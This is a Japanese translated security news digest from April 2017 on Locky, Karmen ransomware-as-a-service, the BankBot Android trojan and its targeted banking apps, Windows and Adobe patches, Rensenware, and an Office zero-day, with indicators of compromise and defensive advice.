      ・ サッサとパッチせよ、頻繁にパッチせよ: ドキュメント マクロを介して出現しないマルウェアは、しばしば、人気のあるアプリケーション(Office、ブラウザ、Flash等)のセキュリティ バグに依存している。速やかにパッチすればするほど、犯罪者が悪用するために残存するセキュリティ ホールは少なくなる。この攻撃に関しては、ユーザは、PDFとWordの最新のアップデートを適用したバージョンを使用していることを確実なものにしておきたい。
      ・ Sophos Intercept X(【訳注】 有料)を使用する: このプログラムは、認証されていないファイルの暗号化をブロックすることで身代金要求型マルウェアの動きを止める。

     Sophosは、このPDFを Troj/PDFDoc-C として、ペイロードを Troj/Locky-UP として検出する。

     役に立つと思われる他のリンク


    低価格のランサムウェア(身代金要求型マルウェア)サービスが発見された
    Kaspersky : ThreatPost (2017/04/18)
     Karmenと名付けられた新たなRansomware as a Service (RaaS、サービスとしてのランサムウェア。【訳注】 サービスとしてランサムウェアを販売することには利点があります。RaaSは、不正活動の出処である作成者が突き止められる可能性を軽減させます。ランサムウェアをサービスとして販売することによって、作成者には、発覚のリスクを増やさずにいくらかの利益を得るという旨味があるのです(Trend Microセキュリティ ブログより))が、Recorded Futureのセキュリティ研究者達によって発見された。
     Karmen RaaSの価格は $175 であり、購入者が身代金額を設定すること、犠牲者への支払い期間や、ターゲットと通信する複数の方法の提供を可能にしている。このコンソールはまた、加入者がクライアントの数と彼等が稼いだ金額を記録することを可能にするダッシュボードとして挙動する。
     Recorded Futureによると、「Karmen身代金要求型マルウェアは、独立型のマルウェアとして販売されており、一括前払いだけを要求している。そして、購入者が感染した犠牲者からの支払いの全額を取り分とすることを許している。」 この身代金要求型マルウェアは、簡易版と完全版の両方で販売されている。簡易版はSandbox同定機能を削除しているので、より小さなファイルサイズで提供されている。

    Recorded Futureは、このマルウェアは3月4日に、ロシア語を話せるDevBitoxもしくはDereck1と名乗るサイバー犯罪者によってアンダーグラウンド フォーラムで RaaSとして販売されていたと発言している。「さらなる調査で、ロシア語を話すサイバー犯罪者DevBitoxが、Karmenマルウェアの背後にいる販売者であることが判明した」と、Recorded Futureの研究者Diana GrangerとAndrei Barysevich(火曜日に公開された、この身代金要求型マルウェアに関するレポートの著者)は記述している。
    DevBitoxに関しては、このハッカーが、これまでに様々なハッキングサーヒスに関してクライアントを募集していたことが観察されているという事実を除いて、Dark Web上でも殆ど分かっていない。Karmen身代金要求型マルウェアは、このハッカーの最初の商用プロジェクトのようだと、研究者達は発言している。
     Karmenは、2015年8月にトルコ人のセキュリティ研究者Utku Senによって教育目的でリリースされたHidden Tearと呼ばれるオープンソース身代金要求型マルウェアと結びついている。このリリースはそれ以来、立て続けに派生物を呼び起こした。

     研究者によると、Karmen感染の最初のケースは、ドイツ及びアメリカ在住の犠牲者によって2016年12月に報告されている。Karmenは、AES-256暗号化を使用して感染したPCのファイルを暗号化する。
     Karmen(もしくは、Hidden Tear)身代金要求型マルウェアは、NoMoreRansom.org上で利用可能な無料ツールで削除することができるが、「現時点で、感染したマシンを、この無料復号プログラムで復号する方法は、利用できない」と、研究者は発言している。
     Karmenは、もしもSandbox環境や解析ソフトウェアが犠牲者のコンピュータ上で検出された場合には、復号プログラムを自動的に削除する機能を含む、幾つかの顕著な機能を持っている。Dark Webでの情報によれば、そこには、販売用の5つの売れ残った製品と共に、Karmenの20バージョンがDevBitoxとして知られる特定の転売人によって販売されていると、Recorded Futureは確信しているとされている。
     「サービスと現在行っているメンテナンスの一貫した品質を提供するために、開発者は顧客に対する販売を幾つかの製品に限定するのが一般的である」と、研究者達は発言している。
     現時点で、Karmenの感染チェーンは未知である。また、Karmenマルウェアに感染した犠牲者の数も定かでない。

     【訳注】 以下はBleepingComputerのKarmenに関する記事からの引用

    IOCs:
    File name: joise.exe
    File name: n_karmen.exe
    File name: build.exe
    File MD5: 9c8fc334a1dc660609f30c077431b547
    File MD5: 56b66af869248749b2f445be8f9f4a9d
    File MD5: 521983cb92cc0b424e58aff11ae9380b
    SHA1: dc875c083c5f70e74dc47373a4ce0df6ccd8ae88
    SHA1: f79f6d4dd6058f58b384390f0932f1e4f4d0fecf
    SHA1: 2a3477ea2d09c855591b3d16cfff8733935db50b
     joise.exe(Karmen)のVirusTotalでの検出結果はコチラ。検出率 43/61、解析日時: 2017/04/18 15:29:35(協定世界時。日本時間: 2017/04/19 00:29:35)。


    GoogleはBankBotトロイと戦っている最中、マルウェアはPlay Storeに到達した
    BleepingComputer : News>Security (2017/04/17)
     BankBot Androidバンキング トロイが、Google技術陣の悩みの種になっている。これは、このマルウェアの特定の部分が、Googleのセキュリティ スキャンを回避する才覚を持っており、定期的に公式のPlay Storeに到着しているためである。
     このバンキング トロイの話題は、名前が付けられていないAndroidバンキング トロイのソースコードが地下のオンライン ハッキング フォーラムにリークされた2017年01月に遡る。
     直後に、何者かがこのソースコードを取得し、BankBotとして知られる新しいバンキング トロイを作成し、その月の末までに、ロシアのユーザをターゲットにして使用していた。
     今年2月、BankBotの作者は、他国(英国、オーストリア、ドイツ、トルコのような)の銀行の顧客を標的にするように、このマルウェアのサポートを改悪した。

    BankBotはGoogleセキュリティ スキャンを回避する能力を持っている

     BankBotはリークされたソースコードに基づいているものの、このマルウェアの作者はコードベースを改悪し、Google Bouncerセキュリティ スキャナを欺くに足る偽装能力をこのマルウェアに追加した。
     研究陣は当初、公式のGoogle Play StoreにAndroidアプリケーションをアップロードする、全部で3つの異なるBankBotキャンペーンを検出した。

    先週検出された更なる二つのキャンペーン

     4月に至ってもなお、これらのキャンペーンは依然としてアクティブである。BankBotは最初に、ロシアのサイバーセキュリティ企業Dr.Webによって検出され、一連のキャンペーンはESETによって検出された。オランダの企業Securifyもまた、二つの新しいBankBotキャンペーンを同定した(二つのアプリケーションがBouncerをバイパスしPlay Storeに到達する)。
     これらのアプリケーションの一つ目は、Funny Videos 2017と名付けられていたものであり、先週、削除されたが、それまでに1000から5000ダウンロードされていた。
     二つ目のアプリケーション(HappyTimes Videos)は、イースター(【訳注】 復活祭、今年は4月16日)の間に発見され、この記事がリリースされる前に削除された。

    先週検出された更なる二つのキャンペーン

     セキュリティの専門家によると、二つのアプリケーションは、BankBotトロイの最新のバージョンに感染させられていた。この名前が仄めかしているように、BankBotはAndroidバンキング トロイである。殆どのAndroidバンキング トロイと同様に、BankBotは、そのユーザの正当なバンキング アプリケーションの上にインチキのログイン ウィンドウを表示する。


    BankBotによって正当なログインウィンドウに重ねて表示されるインチキのログインウィンドウの一部

     実際には、BankBotはバンキング アプリケーション以外の機能も持っているのでログイン認証を盗むことができる。今迄のバージョンは、Facebook, Viber, Youtube, WhatsApp, Uber, Snapchat, WeChat, IMO, Instagram, Twitter, Google Play Storeのようなアプリケーションに関するログインの詳細を盗むことが可能になっていた。
     更に、BankBotは身代金要求型マルウェアのような挙動をして、ユーザのデバイスをロックすることができ、また、二要素認証操作をバイパスする能力を持っているためにSMSメッセージをインターセプトすることもできた。
     以下は、先週明るみに出たBankBotバージョンがターゲットとして設定していた424の正当なバンキング アプリケーションのリストである。
     このリスト中のコードは、通常Google Play Storeアプリケーションのページの末尾に存在している(【訳注】 下の画像の赤枠部分)。あなたは、自身のモバイル バンキング アプリケーションに関してGoogle Play Storeにアクセスし、そのプログラムが以下のリストに存在しているか否かを確認することができる。


    Play Store URLコード(画像をクリックすると拡大されます)

    aib.ibank.android
    aib.ibank.android.tablet
    ar.bapro
    ar.bapro.tablet
    ar.com.redlink.ciudad
    ar.com.santander.rio.mbanking
    ar.macro
    ar.nbad.emobile.android.mobilebank
    at.bawag.mbanking
    at.bawag.tablet
    at.easybank.mbanking
    at.erstebank.george
    at.ing.diba.client.onlinebanking
    at.oberbank.mbanking
    at.psa.app.bawag
    at.spardat.netbanking
    at.volksbank.volksbankmobile
    au.com.amp.myportfolio.android
    au.com.bankwest.mobile
    au.com.heritage.app
    au.com.ingdirect.android
    au.com.macquarie.banking
    au.com.mebank.banking
    au.com.nab.mobile
    au.com.nab.mobile.android.nabconnect
    au.com.pnbank.android
    au.com.suncorp.SuncorpBank
    biz.mobinex.android.apps.cep_sifrematik
    cedacri.mobile.bank.asti
    cedacri.mobile.bank.bppb
    cedacri.mobile.bank.desio.brianza
    ch.raiffeisen.android
    ch.raiffeisen.phototan
    co.uk.Nationwide.Mobile
    com.AlinmaSoftToken
    com.BOQSecure
    com.BankAlBilad
    com.CredemMobile
    com.EurobankEFG
    com.IngDirectAndroid
    com.QIIB
    com.SifrebazCep
    com.VBSmartPhoneApp
    com.a2a.android.burgan
    com.abnamro.grip
    com.abnamro.nl.mobile.payments
    com.abnamro.nl.mobile.wallet
    com.adcb.bank
    com.adib.mbs
    com.akbank.android.apps.akbank_direkt
    com.akbank.android.apps.akbank_direkt_tablet
    com.akbank.softotp
    com.alahli.mobile.android
    com.alinma.smartphone
    com.alpha.pass
    com.amanalrajhi
    com.anz.android.gomoney
    com.appfactory.tmb
    com.arabbank.arabimobile
    com.axabanque.fr
    com.axis.cbk
    com.bancamarch.bancamovil
    com.bancomer.mbanking
    com.bancsabadell.wallet
    com.bankaustria.android.olb
    com.bankia.wallet
    com.bankinter.launcher
    com.bankinter.portugal.bmb
    com.bankofireland.mobilebanking
    com.bankofqueensland.boq
    com.bankofqueensland.boqtablet
    com.barclays.android.barclaysmobilebanking
    com.barclays.bca
    com.barclays.portugal.ui
    com.bawagpsk.securityapp
    com.bbva.bbvacontigo
    com.bbva.bbvawalletmx
    com.bbva.netcash
    com.bbva.netcashar
    com.bbva.nxt_tablet
    com.bendigobank.mobile
    com.binckbank.evolution
    com.bnpp.easybanking
    com.boi.tablet365
    com.boubyanapp.boubyan.bank
    com.boursorama.android.clients
    com.bsffm
    com.business_token
    com.caisse.epargne.android.tablette
    com.caisseepargne.android.mobilebanking
    com.cajamar.GCCajamar
    com.cajasur.android
    com.carrefour.bank
    com.cba.android.netbank
    com.cba.shiraz
    com.cbd.mobile
    com.cbq.CBMobile
    com.cic_prod.bad
    com.cic_prod_tablet.bad
    com.citi.regional.argentina
    com.citibank.mobile.au
    com.citibank.mobile.citiuaePAT
    com.cleverlance.csas.servis24
    com.cm_prod.bad
    com.cm_prod_tablet.bad
    com.comarch.mobile
    com.comarch.mobile.banking.bnpparibas
    com.comarch.security.mobilebanking
    com.comdirect.phototan
    com.commbank.netbank
    com.commerzbank.kontostand
    com.commerzbank.photoTAN
    com.cs.vasco
    com.csg.cs.dnmb
    com.db.mm.deutschebank
    com.db.mobilebanking
    com.db.pbc.miabanca
    com.db.pbc.mibanco
    com.db.pbc.phototan.db
    com.db.tabbanking
    com.defencebank.locationapp
    com.dib.app
    com.ducont.meethaq
    com.ducont.muscatbank
    com.entersekt.authapp.dkb
    com.ezmcom.softtoken.adcb
    com.finansbank.mobile.cepsube
    com.finanteq.finance.ca
    com.firstdirect.bankingonthego
    com.fpe.comptenickel
    com.fullsix.android.labanquepostale.accountaccess
    com.fusion.banking
    com.fusion.beyondbank
    com.garanti.bonusapp
    com.garanti.cepbank
    com.garanti.cepsubesi
    com.getingroup.mobilebanking
    com.gieseckedevrient.android.wallet.rabo
    com.google.android.1gm1
    com.greater.Greater
    com.grppl.android.shell.BOS
    com.grppl.android.shell.CMBlloydsTSB73
    com.grppl.android.shell.halifax
    com.hipotecario.mobile
    com.hsbc.hsbcukcmb
    com.htsu.hsbcpersonalbanking
    com.icbc.mobile.abroadARG
    com.icomvision.bsc.mobilebank
    com.ideaknow.ing
    com.ie.capitalone.uk
    com.iflex.fcat.mobile.android
    com.imb.banking2
    com.ing.diba.mbbr2
    com.ing.diba.smartsecure2
    com.ing.mobile
    com.ing.mobilepayments
    com.ingbanktr.cuzdan
    com.ingbanktr.ingmobil
    com.intertech.mobilemoneytransfer.activity
    com.isis_papyrus.raiffeisen_pay_eyewdg
    com.kbc.mobilebanking
    com.kfh.kfhonline
    com.kutxabank.android
    com.kutxabank.appatxas
    com.kuveytturk.mobil
    com.latuabanca_tabperandroid
    com.latuabancaperandroid
    com.latuabancaperandroid.ispb
    com.latuabancaperandroid.pg
    com.lcl.application.tablette
    com.lloydsbank.businessmobile
    com.magiclick.odeabank
    com.mbanking.nbb
    com.mediaengine.allianzbank
    com.mediolanum.android.bst
    com.mediolanum.android.fullbanca
    com.mediolanum.android.wallet
    com.mobileloft.alpha.droid
    com.mobilenik.bsf
    com.mobilenik.ubika.bna
    com.monitise.client.android.clydesdale
    com.monitise.client.android.yorkshire
    com.monitise.coop
    com.mosync.app_Banco_Galicia
    com.nbo.ar
    com.nbo.mobs
    com.ncb.softtoken
    com.nearform.ptsb
    com.niobiumlabs.eurobank.activity
    com.ofss.fcdb.mobile.android.phone.bahl.launcher
    com.opentecheng.android.webank
    com.paypal.android.p2pmobile
    com.paypal.here
    com.posteitaliane.postemobilestore
    com.pozitron.anb
    com.pozitron.ingkurumsal
    com.pozitron.iscep
    com.pozitron.vakifbank
    com.rak
    com.rbs.mobile.android.natwest
    com.rbs.mobile.android.natwestbandc
    com.rbs.mobile.android.rbsbandc
    com.rbs.mobile.android.rbsm
    com.rbs.mobile.android.ubn
    com.rev.mobilebanking.westpac
    com.rsi
    com.rsi.ruralviatablet
    com.s4m
    com.sa.baj.aljazirasmart
    com.sabb
    com.samba.mb
    com.scb.ae.bmw
    com.scrignosa
    com.sella.BancaSella
    com.softtech.isbankasi
    com.solidpass.main.bsf
    com.starfinanz.mobile.android.dkbpushtan
    com.starfinanz.mobile.android.pushtan
    com.starfinanz.smob.android.sbanking
    com.starfinanz.smob.android.sbanking.tablet
    com.starfinanz.smob.android.sfinanzstatus
    com.starfinanz.smob.android.sfinanzstatus.tablet
    com.supervielle.mBanking
    com.swmind.vcc.android.bzwbk_mobile.app
    com.targo_prod.bad
    com.targo_prod_tablet.bad
    com.teb
    com.tecnocom.cajalaboral
    com.tescobank.mobile
    com.tmob.denizbank
    com.tmobtech.halkbank
    com.ubank.internetbanking
    com.ubs.swidK2Y.android
    com.ubs.swidKXJ.android
    com.unicajaTabletas
    com.unicredit
    com.vakifbank.mobile
    com.vipera.ts.starter.FGB
    com.vipera.ts.starter.MashreqAE
    com.vipera.ts.starter.MashreqQA
    com.vipera.ts.starter.QNB
    com.ykb.android
    com.ykb.android.db
    com.ykb.android.mobilonay
    com.ykb.androidtablet
    com.ykb.avm
    com.zentity.ing
    com.ziraat.ziraatmobil
    coop.bancocredicoop.bancamobile
    cz.airbank.android
    cz.csas.app.mujstav
    cz.csas.business24
    cz.csob.smartbanking
    cz.csob.smartklic
    cz.kb.mba.business
    cz.mbank
    cz.moneta.smartbanka
    cz.rb.app.smartphonebanking
    cz.sberbankcz
    cz.ulikeit.fio
    de.adesso.mobile.android.gadfints
    de.comdirect
    de.comdirect.android
    de.commerzbanking.mobil
    de.consorsbank
    de.dkb.portalapp
    de.dzbank.kartenregie
    de.fgi.ms.securesign
    de.fgi.ms.vrsecurecard
    de.fiducia.smartphone.android.banking.bb
    de.fiducia.smartphone.android.banking.psd
    de.fiducia.smartphone.android.banking.vr
    de.fiducia.smartphone.android.securego.vr
    de.ing_diba.kontostand
    de.postbank.finanzassistent
    de.sdvrz.ihb.mobile.app
    de.sdvrz.ihb.mobile.secureapp.netbank.produktion
    de.sdvrz.ihb.mobile.secureapp.sparda.produktion
    enbd.mobilebanking
    enbd.mobilebanking.ksamobile
    enbd.mobilebanking.smartbusiness
    es.bancopopular.nbmpopular
    es.bancopopular.nbmpopulartablet
    es.bancosantander.apps
    es.bancosantander.empresas
    es.bancosantander.wallet
    es.bmn.bmnapp2
    es.bmn.cajagranadaapp2
    es.bmn.cajamurciaapp2
    es.bmn.sanostraapp2
    es.caixagalicia.activamovil
    es.caixageral.caixageralapp
    es.ccm.ccmapp
    es.cm.android
    es.cm.android.tablet
    es.connectis.mobile.alrajhi
    es.evobanco.bancamovil
    es.lacaixa.hceicon2
    es.lacaixa.mobile.android.newwapicon
    es.liberbank.cajasturapp
    es.redsys.walletmb.app.kutxa.pro
    es.redsys.walletmb.app.laboralkutxa.pro
    es.santander.money
    es.univia.unicajamovil
    eu.eleader.mobilebanking.abk
    eu.eleader.mobilebanking.bre
    eu.eleader.mobilebanking.nbk
    eu.eleader.mobilebanking.pekao
    eu.eleader.mobilebanking.pekao.firm
    eu.eleader.mobilebanking.raiffeisen
    eu.inmite.prj.kb.mobilbank
    finansbank.enpara
    fr.banquepopulaire.cyberplus
    fr.banquepopulaire.cyberplus.pro
    fr.banquepopulaire.cyberplustablet
    fr.bred.fr
    fr.creditagricole.androidapp
    fr.creditagricole.macarteca
    fr.lcl.android.customerarea
    fr.lcl.android.entreprise
    ftb.ibank.android
    gr.winbank.mobile
    hr.asseco.android.jimba.mUCI.cz
    hr.asseco.android.jimba.mUCI.cz.tablet
    hr.asseco.android.mtoken.credem.credemprod
    hr.asseco.android.mtoken.pekao
    it.bcc.iccrea.mycartabcc
    it.bnl.androidTablet
    it.bnl.apps.banking
    it.bpm.bpmandroid
    it.bpm.ptbandroid
    it.carige
    it.cividale.bpconline
    it.copergmps.rt.pf.android.sp.bmps
    it.copergmps.rt.pf.android.tab.ui.bmps
    it.creval.bancaperta
    it.elfisystems.ncbc.droid.tablet
    it.elfisystems.ncbc.mobile
    it.gruppobper.ams.android.bper
    it.ingdirect.app
    it.nogood.container
    it.popso.SCRIGNOapp
    it.relaxbanking
    it.reply.up.mobile.android
    it.secservizi.mobile.atime
    it.secservizi.mobile.atime.bpaa
    it.secservizi.mobile.atime.bpvi
    it.ubi.digitalcode
    it.ubiss.mpay
    it.volksbank.android
    mbanking.NBG
    mobi.societegenerale.mobile.lappli
    mobi.societegenerale.mobile.lapplipro
    mobile.alphabank.myAlphaWallet_android
    mobile.santander.de
    net.atos.alrajhi.mobilekw
    net.bnpparibas.mescomptes
    net.inverline.bancosabadell.officelocator.android
    nl.asnbank.asnbankieren
    nl.rabomobiel
    nl.regiobank.regiobankieren
    nl.snsbank.snsbankieren
    nl.snsbank.snshelp
    nz.co.amp.myportfolio.android
    nz.co.anz.android.mobilebanking
    nz.co.asb.asbmobile
    nz.co.asb.mobilebusiness
    nz.co.bnz.droidbanking
    nz.co.bnz.droidbusinessbanking
    nz.co.cooperativebank
    nz.co.kiwibank.mobile
    nz.co.westpac
    org.banelco
    org.banelco.ibay
    org.banelco.qlms
    org.banelco.rbts
    org.banelco.sdmr
    org.banking.bom.businessconnect
    org.banking.bsa.businessconnect
    org.banking.stg.businessconnect
    org.banksa.bank
    org.bom.bank
    org.microemu.android.model.common.VTUserApplicationLIN☒
    org.microemu.android.model.common.VTUserApplicationLIN☒
    org.stgeorge.bank
    org.westpac.bank
    org.westpac.col
    pl.aliorbank.kantorwalutowy
    pl.bzwbk.bzwbk24
    pl.bzwbk.ibiznes24
    pl.bzwbk.mobile.tab.bzwbk24
    pl.com.suntech.mobileconnect
    pl.eurobank
    pl.ing.ingmobile
    pl.ipko.mobile
    pl.mbank
    pl.millennium.corpApp
    pl.pkobp.iko
    posteitaliane.posteapp.appbpol
    pt.BancoPopular.android.app
    pt.bancobest.android.mobilebanking
    pt.bancobpi.mobile.autorizacoesempresas
    pt.bancobpi.mobile.fiabilizacao
    pt.bes.bestablet
    pt.cgd.caixadirecta
    pt.cgd.caixadirectaempresas
    pt.novobanco.nbapp
    pt.santandertotta.mobileparticulares
    pt.sibs.android.mbway
    riyad.bankingapp.android
    rm.beleggen
    tr.com.sekerbilisim.mbank
    tsb.mobilebanking
    uk.co.bankofscotland.businessbank
    uk.co.metrobankonline.personal.mobile
    uk.co.northernbank.android.tribank
    uk.co.santander.businessUK.bb
    uk.co.santander.santanderUK
    uk.co.tsb.mobilebank
    wit.android.bcpBankingApp.activoBank
    wit.android.bcpBankingApp.millennium
    wit.android.bcpBankingApp.millenniumPL
    www.ingdirect.nativeframe
    Com.android.vendin?(先頭のCはCにセディーユ)


    Microsoftは、Windows 7 と 8.1 が稼働している新しいCPU搭載モデルに対するアップデートを停止している
    BleepingComputer : News>Security (2017/04/14)
     今月から、Microsoftは、Intel第7世代(Kaby Lake)、AMD第7世代(Bistol Ridge)のような最新のプロセッサ モデル上で稼働しているWindows 7 と 8.1 へのアップデートの配布を停止していた。
     Microsoftは、新しいCPUモデルへのサポートは、最新のOSであるWindows 10に限定され、End-Of-Lifeの過程にあるWindows 7 と 8.1 はサポートされないと発言している。

    Microsoftは昨年PC所有者に警告していた

     Microsoftは、2016年01月03月08月に、その意図をアナウンスしていた。Microsoftはこの変更に関して特定の期限を決してアナウンスしなかった。そして、Microsfotがサポートトピックを2017年03月にオンラインに上げた場合でさえ、この期限はアナウンスされなかったので、今月の定例パッチは、多くのPC所有者に驚きを与えることになった。
     今月、新しいCPUでWindows 7 と 8.1 を稼働しているユーザへのアップデートは、以下の警告が表示される。
    Your PC uses a processor that is designed for the latest version of Windows. Because the processor is not supported together with the Windows version that you are currently using, your system will miss the important security updates.

    あなたのPCはWindowsの最新バージョン用に設計されたプロセッサを使用している。このプロセッサと、あなたが現在使用中のWindowsバージョンとの組み合わせはサポートされない。あなたのシステムは重要なセキュリティ アップデートを取得できない。

    【訳注】 Microsoftの日本語サイトに、この部分の和訳を見つけることができませんでしたので、対訳しておきます。

     今月のアップデートから、Windows 7 と 8.1 ユーザはWindowsアップデートをスキャンしたりダウンロードしようとした時、以下のエラーの一つを受け取るだろう。

    サポートされていないハードウェア
    お使いの PC はこのバージョンの Windows でサポートされていないプロセッサを使用しています。更新プログラムは利用できません。(Microsoft日本語サイトより引用)

    もしくは、

    新しい更新プログラムを検索できませんでした
    このコンピューターで利用できる新しい更新プログラムを確認中にエラーが発生しました。
    エラー:
    コード 80240037 Windows Update で不明なエラーが発生しました。(Microsoft日本語サイトより引用)

    以下の第7世代のCPUモデルの所有者が影響を受けることが知られている。

      ・ Intel 第 7 世代プロセッサ(Intel Core ix 7xxx)
      ・ AMD “Bristol Ridge/Ryzem/Zen”
      ・ Qualcomm “8996"

     このことは、Microsoftが、Windows 7 と Windows 8.1 に関して全ての古いCPUモデルをサポートすることを意味していない。これは、Micorosoftが現在、Skylakeとして知られるIntel第6世代プロセッサをサポートする予定の16のOEMベンダ(リンクは日本語サイトに変更しています)をリストしているからである。
     未だWindows 7 と 8.1 を稼働している新しいCPUモデルの所有者に対して、Microsoftは、Windows 10 へのアップデートを推奨している。


    AdobeとMicrosoftから緊急のセキュリティ アップデート
    Krebs On Security : Blog (2017/04/12)
     AdobeとMicrosoftは夫々、彼等の製品中の大量のセキュリティ フローを修正するためのアップデートを火曜日にリリースした。Adobeは、Flash Player、Acrobat、Reader中の数ダースのセキュリティ ホールをパッチした。Microsoftは、Windows及び関連ソフトウェア中の数ダースの脆弱性を解決するための修正をリリースした。
     Windowsユーザと、取り分け多くのWindowsマシンに管理責任のある人々にとって、今月の最大の変更は、Microsoftがパッチ用の個別のセキュリティ ブレティンを単一の「セキュリティ更新プログラムガイド」に置き換えたことである。
     この変更は、Microsoftにより、特定のアップデートを選択的にダウンロードすることからホームユーザを締め出すために、一つの大きなパッチの塊として全ての定例アップデートをリリースするという変更の余波に密接に関連している。
     顧客は、この強化されたガイドを求めていたとするMicrosoftの主張にも拘わらず、多くのユーザは、新しいフォーマットに多分ウンザリしているだろう(今迄の規定の下より、より多くのクリックと検索を要求されるようである)。どのような場合であれ、Microsoftは、何が変更されたのか、人々が新しい取り決めの下で何を期待できるのかを説明するために、FAQをリリースしてきた。
     私が数えたところでは、今週のMicrosoftのパッチは、46のセキュリティ上の脆弱性(Internet Explorer, Microsoft Edge, Windows, Office, Visual Studio for Mac, .NET Framework, Silverlight, Adobe Flash Player中のフローを含む)を解決している。
     今月Microsoftによって修正された緊急のバグの少くとも二つは、既に積極的な攻撃中で悪用されている(Dridexバンキング トロイを拡散するように設計された攻撃で表面化したMicrosoft Word中の弱点を含む)。
     最後に、依然としてWindows Vistaを稼働させている全てのMicrosoftユーザへの注意喚起: 今月は、Vistaが受け取ることのできるセキュリティアップデートの最終月である。Vistaが最初に消費者に対してリリースされたのは、10年以上前の2007年01月である。あなたが未だVistaを使い続けているのであれば、より最先端のOS(Windowsである必要はない。【訳注】 Linuxという名前を聞いただけで嫌われますが、2004年頃のマシンでもLinuxはかなり軽快に動作します。インターフェースに慣れるのに多少時間を要する方もおられますが、ほぼWindows同等の感覚で作業できます。人気のUbuntu系列でLubunt、Xubuntu、Bean等を試されることをお勧めします。BeanはDefaultでWindowsアプリケーションのエミュレータであるWineを搭載しています。なお、Linux側からWindowsのファイルは操作可能です。)を試す時宜かもしれない。
    Microsoftの定例のパッチの実行に慣れているように、Adobeも独自の一団のセキュリティパッチをリリースした。いつものFlash Playerの緊急のアップデートは、少なくとも7つのフローを修正している。新しいバージョンは、Windows、Mac、Linux用は、v. 25.0.0.148 である。
     此処の常連であれば既に知っていると思うが、私は膨大なセキュリティ ホールの存在からFlashを嫌っている。ドライブ-バイ マルウェア攻撃のお気に入りのターゲットであり、最早、インストールされたり、あるいは、ずっとONにしておく必然性は本当に存在しない。
     それ故、あなたがFlashをインストールしているのであれば、可能な限り早急にFlashをアップデートするか、妨げるか、あるいは、削除すべきである。あなたのブラウザが、Flashのどのバージョンをインストールしているのか確認するには、このページをチェックしなさい。
     最も賢明なオプションは多分、今回限りで、このプログラムを見捨てることであり、このプロセスであなたのシステムのセキュリティを顕著に増加させることができる。それ自体をブラウザに結合する大変強力でバグだらけのプログラムであるFlashは、攻撃者とマルウェアのお気に入りのターゲットである。Flashを妨害したり、Flash無しで実行したりする方法(根本的な解決策には僅かに届かない)についての幾つかのアイデアに関しては、A Month Without Adobe Flash Playerをチェックしなさい。
     あなたがFlashを維持し続けることを選択するなら、今日アップデートしなさい。Flashの最新のバージョンは、Flashホームページから利用可能である。Internet Explorer以外のブラウザでWebをブラウズしているWindowsユーザは、このパッチを夫々のブラウザで適用する必要がある。IEで一回、使用している他のブラウザでも夫々。
     ChromeとIEは、ブラウザを再起動することで最新のFlashバージョンを自動インストールするはずである(ユーザはアップデートを手動でチェックし、最新のFlashバージョンを入手するためにブラウザを再起動する必要があるかもしれない)。Chromeユーザは、この最新のバージョンをインストールもしくは、自動ダウンロードするために、このブラウザを再起動する必要があるかもしれない。疑わしい時は、URLバーの右側にある縦に三つのドットが並んでいるアイコンをクリックし、「ヘルプ」、次に、「Chromeについて」を選択しなさい。そこに利用可能なアップデートがあれば、Chromeは次回、最新バージョンをインストールするはずである。
     Adobeは、Photoshop、Adobe Reader、Acrobatソフトウェア パッケージ用のセキュリティ フィックスもリリースしている。Reader / Acrobatアップデートは、これらの製品中の大変多くの47のセキュリティ ホールを解決している。あなたが、これらのプログラムの何れかをインストールしているのであれば、アップデートの時間を取りなさい。
     最後の2行は省略します。

     

    アニメ ファンをターゲットにしたRensenwareは、復号に熱狂的な挑戦を要求する
    Bitdefender : Hot For Security (2017/04/11)
     アニメを愛する人は、ダウンロードするものに注意しなさい。新しいタイプの身代金要求型マルウェアが、悪意からではなくオンラインにリリースされていた。
     ファイルを復号するために、Rensenwareは、法外な金額を要求する代わりに、弾幕型シューティングゲームTouhou Seirensen(東方星蓮船)で遊ぶことを要求する。そして、このマルウェアの製作者でさえ自分のコンピュータが感染した時に、クリアすることができないであろう2億ポイント("lunatic"レベル)という常軌を逸したスコアに到達することだけを要求してくる。
     この開発者は、Typle Eraserと名乗る韓国の学生である。事件発覚以来オンラインに謝罪をリリースした作者によると、Rensenwareは単に面白がって開発しただけであり、悪意はなかった、ということである。この身代金要求型マルウェアは、GitHubにポストされ数時間のうちに拡散した。感染の後、この学生は復号ソフトをリリースしている。
     「私は、冗談でこれを作った、そして、東方Projectシリーズが好きな人達と笑いたかっただけだ。私はコンパイルされたバイナリを除き、Web上でソースコードを配布した。」 この謝罪は続けて、「しかしながら、配布の時点で、悲劇は始まっていた。一部の人々が私を非難した。尤もなことだ。私は明らかな間違いを犯した。この謝罪が、皆さんにとって十分なものか否か分からない。十分なものでなければ、私はまた謝罪する。害を及ぼそうとしたわけではない。私は、皆さんが、このことを理解してくれることを希望する。」
     当初の計画が、害を発生させることを意図せず、ソースコードが削除されていようとも、コードの一部は多分、オンラインの何処かのアーカイブに存在している。つまるところ、ハッカーは、このコードを腐敗したものへ変更することを考えるだろう。


    新しいOfficeへの0-Day攻撃が検出された
    BleepingComputer : News>Security (2017/04/08)
     サイバーセキュリティ企業McAfeeFireEyeが、インターネット上の新たなMicrosoft Officeへの0-Day攻撃を公開した。この0-Dayの脆弱性は、攻撃者がターゲットのマシンにコッソリとコードを実行しマルウェアをインストールすることを可能にするものである。
     Microsoftは、この0-Dayを認識しているが、三日後にスケジュールされている次回のパッチの火曜日(【訳注】 毎月第二火曜日のMicrosoftの定例パッチの日)までにパッチが配布されることは粗ありえないだろう。
     この0-Dayの存在を公開したMcAfeeの研究者は、彼等が今年1月以降、この未パッチの脆弱性を悪用した攻撃を検出していたと発言している。

    Office保護ビューは、この攻撃を阻止する

     この0-Dayへの攻撃は単純なシナリオに従い、敵が犠牲者にMicrosoft WordドキュメントをeMailすることで始まる。このWordドキュメントは、ブービートラップされたOLE2linkオブジェクトを含んでいる。
     犠牲者が、ファイルを開く時、Office保護ビュー(リンクは日本語サイトに変更してあります)を使用していたなら、この脆弱性攻撃は無効になり、絶対に実行されない。ユーザが保護ビューを無効にしていた場合には、この脆弱性攻撃は自動的に実行され、RTFを装ったHTA(HTMLアプリケーション、【訳注】 外観はHTML、内部処理はVBScriptあるいはJavaScriptで実装する(It Proより))ファイルをダウンロードする場所から、攻撃者のサーバーに対してHTTPリクエストを実行する。
     このHTAファイルは、自動的に実行され、ユーザのマシンを乗っ取るために脆弱性攻撃コードを起動し、兵器化されたWordファイルを終了し、代わりに、囮のドキュメントを表示する。
     FireEyeによると、「オリジナルのwinword.exeプロセスは、OLE2linkによって生成されたユーザ プロンプトを隠すために終了させられる。」
